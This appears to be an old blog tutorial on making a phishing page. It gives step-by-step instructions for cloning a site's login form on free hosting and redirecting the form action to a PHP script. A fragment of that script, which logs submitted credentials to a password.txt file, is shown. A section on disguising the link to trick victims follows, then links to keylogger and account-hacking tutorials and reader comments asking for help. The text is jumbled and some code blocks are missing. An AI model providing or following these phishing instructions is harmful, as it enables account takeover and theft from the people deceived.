Phishing Tutorial
Index: A phisher is a fake login page used to gain access to someones account. When someone logs into the fake login page, there password is sent to you. ————————– In order to make a phisher, you need a web hosting site, I recommend T35. Sign up with a free acount and title it (websiteyourgonnaphish).spam.com For example: myspace.spam.com Most likeley, it is taken so add numbers like 08, or 07. ————————————– After you create that page, go to the website you will make a phisher for, I will use KHI ( ———————— Once you have that copied, go to your T35 account. Click on “New File” Title it login.htm Then paste your Source Code you copied from 104. Save it. Now create another file, title it fhish.php And inside, paste this code: Code: Save the file. Go back to your login.htm file and click edit. Press CTRL+F and type in action= in the box. Keep pressing find until you find something that says action=(something that has to do with logging in). Replace that with fhish.php. Congratulations, you have a phisher! ————————- Code: That is the link to your phishing page. When people login to that, you will get the password in a password.txt file that will be created when someone types something into it. But, you have to trick people. Use this code.
What is a phisher? – 101
Making a T35 Account – 102
Getting Web pages Source Code – 103
Creating Phish File – 104
How to fool people – 105
————————
What is a phisher? 101
————————
Making a T35 Account 102
————————–
Getting Web Pages Source Code 103
————————————–
Creating Phish File 104
————————
$value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>
The
How to fool people – 105
————————-
What you do now is disguise your link. Use this code:
T35acount.spam.com/login.htm
Code:
Comments
You May Also Like To Read:
- How to create a fake login for phishing yourself
- Internet Explorer Hot Keys
- Gmail Fake login for Phishing
- simple phishing attack for password stealing !!
- Keylogger – a deadly wepon for hacking(full tutorial)
- CAPTCHA!! 10 free Captch scripts.
- Ultimate Email Hacking Tutorial
- AIO Crack Searching & Shareware Hacking 2009
- GET A CUSTOM CO.CC DOMAIN FOR BLOGSPOT
- Create a Shortcut to Delete Recent Items in Windows Vista (or XP’s) Start Menu









action=(something that has to do with logging in). Replace that with fhish.php.
what do you have to change action= or the whole ?
Don’t change action=
change the whole -.-
I can’t find T35.com
what can I use instead of that ?
thanks for help
D